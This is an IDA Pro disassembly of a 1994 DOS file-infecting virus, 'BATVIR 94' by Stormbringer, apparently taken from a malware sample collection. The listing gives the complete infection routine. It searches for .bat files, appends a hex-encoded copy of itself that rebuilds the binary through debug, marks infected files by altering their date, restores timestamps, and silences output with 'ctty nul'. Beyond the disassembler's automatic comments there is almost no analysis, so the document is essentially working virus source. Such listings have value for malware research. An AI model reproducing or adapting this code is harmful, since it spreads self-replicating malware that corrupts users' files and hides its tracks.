;
; +-------------------------------------------------------------------------+
; |      This file was generated by The Interactive Disassembler (IDA)      |
; |           Copyright (c) 2025 Hex-Rays, <support@hex-rays.com>           |
; |                      License info: 48-2137-ACAB-99                      |
; |                      IDAPRO9 <idapro9@example.com>                      |
; +-------------------------------------------------------------------------+
;
; Input SHA256 : 0CBF5B184108695B22AA0ED5F41A463665EEAFA353880AC487CA6B4310D23BF5
; Input MD5    : E9D8393CEA03C20F78C60FF2EACEC360
; Input CRC32  : 1CDD601B

; ---------------------------------------------------------------------------
; File Name   : /home/petik/Downloads/suburbs/Vir94/Virus.BAT.Vir94.com-0cbf5b184108695b22aa0ed5f41a463665eeafa353880ac487ca6b4310d23bf5
; Format      : Binary file
; Base Address: 0000h Range: 0000h - 01CAh Loaded length: 01CAh

                .686p
                .mmx
                .model small

; ===========================================================================

; Segment type: Pure code
seg000          segment byte public 'CODE' use16
                assume cs:seg000
                assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
                mov     ah, 4Eh ; 'N'
                mov     dx, 235h

loc_5:                                  ; CODE XREF: seg000:004C↓j
                int     21h             ; DOS - 2+ - FIND FIRST ASCIZ (FINDFIRST)
                                        ; CX = search attributes
                                        ; DS:DX -> ASCIZ filespec
                                        ; (drive, path, and wildcards allowed)
                jb      short loc_4E
                mov     dx, 9Eh
                mov     ax, 3D02h
                int     21h             ; DOS - 2+ - OPEN DISK FILE WITH HANDLE
                                        ; DS:DX -> ASCIZ filename
                                        ; AL = access mode
                                        ; 2 - read & write
                jb      short loc_4A
                xchg    ax, bx
                mov     ax, 5700h
                int     21h             ; DOS - 2+ - GET FILE'S DATE/TIME
                                        ; BX = file handle
                push    cx
                push    dx
                cmp     dh, 80h
                jnb     short loc_3F
                mov     ax, 4202h
                xor     cx, cx
                xor     dx, dx
                int     21h             ; DOS - 2+ - MOVE FILE READ/WRITE POINTER (LSEEK)
                                        ; AL = method: offset from end of file
                mov     si, 100h
                mov     di, 2CAh
                mov     cx, 1CAh
                push    bx
                call    sub_53
                pop     bx
                call    sub_80
                pop     dx
                add     dh, 0C8h
                push    dx

loc_3F:                                 ; CODE XREF: seg000:001E↑j
                pop     dx
                pop     cx
                mov     ax, 5701h
                int     21h             ; DOS - 2+ - SET FILE'S DATE/TIME
                                        ; BX = file handle, CX = time to be set
                                        ; DX = date to be set
                mov     ah, 3Eh
                int     21h             ; DOS - 2+ - CLOSE A FILE WITH HANDLE
                                        ; BX = file handle

loc_4A:                                 ; CODE XREF: seg000:0011↑j
                mov     ah, 4Fh ; 'O'
                jmp     short loc_5
; ---------------------------------------------------------------------------

loc_4E:                                 ; CODE XREF: seg000:0007↑j
                mov     ax, 4C00h
                int     21h             ; DOS - 2+ - QUIT WITH EXIT CODE (EXIT)
                                        ; AL = exit code

; =============== S U B R O U T I N E =======================================


sub_53          proc near               ; CODE XREF: seg000:0033↑p sub_53+1E↓j ...
                push    cx
                lodsb
                mov     bx, ax
                mov     cx, 4
                shr     al, cl
                push    ax
                call    sub_76
                stosb
                pop     ax
                shl     al, cl
                sub     bl, al
                xchg    al, bl
                call    sub_76
                stosb
                mov     ax, 20h ; ' '
                stosb
                pop     cx
                loop    sub_53
                stosb
                stosb
                retn
sub_53          endp


; =============== S U B R O U T I N E =======================================


sub_76          proc near               ; CODE XREF: sub_53+A↑p sub_53+15↑p
                cmp     al, 0Ah
                jnb     short loc_7D
                add     al, 30h ; '0'
                retn
; ---------------------------------------------------------------------------

loc_7D:                                 ; CODE XREF: sub_76+2↑j
                add     al, 37h ; '7'
                retn
sub_76          endp


; =============== S U B R O U T I N E =======================================


sub_80          proc near               ; CODE XREF: seg000:0037↑p
                mov     ah, 40h ; '@'

loc_82:                                 ; DATA XREF: seg000:loc_5↑r
                                        ; seg000:000F↑r ...
                mov     dx, 280h
                mov     cx, 40h ; '@'
                int     21h             ; DOS - 2+ - WRITE TO FILE WITH HANDLE
                                        ; BX = file handle, CX = number of bytes to write, DS:DX -> buffer
                mov     dx, 2CAh

loc_8D:                                 ; CODE XREF: sub_80+32↓j
                push    dx
                call    sub_FA
                call    sub_EA
                pop     dx
                push    dx
                mov     cx, di
                sub     cx, dx
                cmp     cx, 3Ch ; '<'
                jb      short loc_A2
                mov     cx, 3Ch ; '<'

loc_A2:                                 ; CODE XREF: sub_80+1D↑j
                mov     ah, 40h
                int     21h             ; DOS - 2+ - WRITE TO FILE WITH HANDLE
                                        ; BX = file handle, CX = number of bytes to write, DS:DX -> buffer
                push    ax
                call    sub_DF
                pop     ax
                pop     dx
                add     dx, ax
                cmp     dx, di
                jnb     short loc_B4
                jmp     short loc_8D
; ---------------------------------------------------------------------------

loc_B4:                                 ; CODE XREF: sub_80+30↑j
                call    sub_EF
                mov     ah, 40h ; '@'
                mov     dx, 23Bh
                mov     cx, 1
                int     21h             ; DOS - 2+ - WRITE TO FILE WITH HANDLE
                                        ; BX = file handle, CX = number of bytes to write, DS:DX -> buffer
                call    sub_DF
                call    sub_EF
                mov     ah, 40h ; '@'
                mov     dx, 23Ch
                mov     cx, 1
                int     21h             ; DOS - 2+ - WRITE TO FILE WITH HANDLE
                                        ; BX = file handle, CX = number of bytes to write, DS:DX -> buffer
                call    sub_DF
                mov     dx, 256h
                mov     cx, 2Ah ; '*'
                mov     ah, 40h
                int     21h             ; DOS - 2+ - WRITE TO FILE WITH HANDLE
                                        ; BX = file handle, CX = number of bytes to write, DS:DX -> buffer
                retn
sub_80          endp


; =============== S U B R O U T I N E =======================================


sub_DF          proc near               ; CODE XREF: sub_80+27↑p sub_80+41↑p ...
                mov     dx, 248h
                mov     cx, 0Eh
                mov     ah, 40h
                int     21h             ; DOS - 2+ - WRITE TO FILE WITH HANDLE
                                        ; BX = file handle, CX = number of bytes to write, DS:DX -> buffer
                retn
sub_DF          endp


; =============== S U B R O U T I N E =======================================


sub_EA          proc near               ; CODE XREF: sub_80+11↑p
                mov     cx, 0Bh
                jmp     short loc_F2
sub_EA          endp


; =============== S U B R O U T I N E =======================================


sub_EF          proc near               ; CODE XREF: sub_80:loc_B4↑p sub_80+44↑p
                mov     cx, 5

loc_F2:                                 ; CODE XREF: sub_EA+3↑j
                mov     dx, 23Dh
                mov     ah, 40h
                int     21h             ; DOS - 2+ - WRITE TO FILE WITH HANDLE
                                        ; BX = file handle, CX = number of bytes to write, DS:DX -> buffer
                retn
sub_EF          endp


; =============== S U B R O U T I N E =======================================


sub_FA          proc near               ; CODE XREF: sub_80+E↑p
                push    ax
                push    bx
                push    cx
                push    dx
                push    si
                push    di
                sub     dx, 2CAh
                mov     ax, dx
                mov     cx, 3
                xor     dx, dx
                div     cx
                mov     dx, ax
                add     dx, 100h
                mov     di, 2C2h
                mov     si, 2C0h
                xchg    dh, dl
                mov     ds:2C0h, dx
                mov     cx, 2
                call    sub_53
                mov     di, 243h
                mov     si, 2C2h
                movsw
                lodsb
                movsw
                pop     di
                pop     si
                pop     dx
                pop     cx
                pop     bx
                pop     ax
                retn
sub_FA          endp

; ---------------------------------------------------------------------------
                db  2Ah ; *
aBat            db '.bat',0
aGqechoE0100Bat db 'gqecho e0100  >>batvir.94',0Dh,0Ah
                db 'debug<batvir.94',0Dh,0Ah
                db 'del batvir.94',0Dh,0Ah
                db 'ctty con',0Dh,0Ah
                db 0Dh,0Ah
                db '@echo off',0Dh,0Ah
                db 'ctty nul',0Dh,0Ah
                db 'rem [BATVIR] ',27h,'94 (c) Stormbringer [P/S]',0Dh,0Ah,0
                db 9 dup(0)
seg000          ends


                end
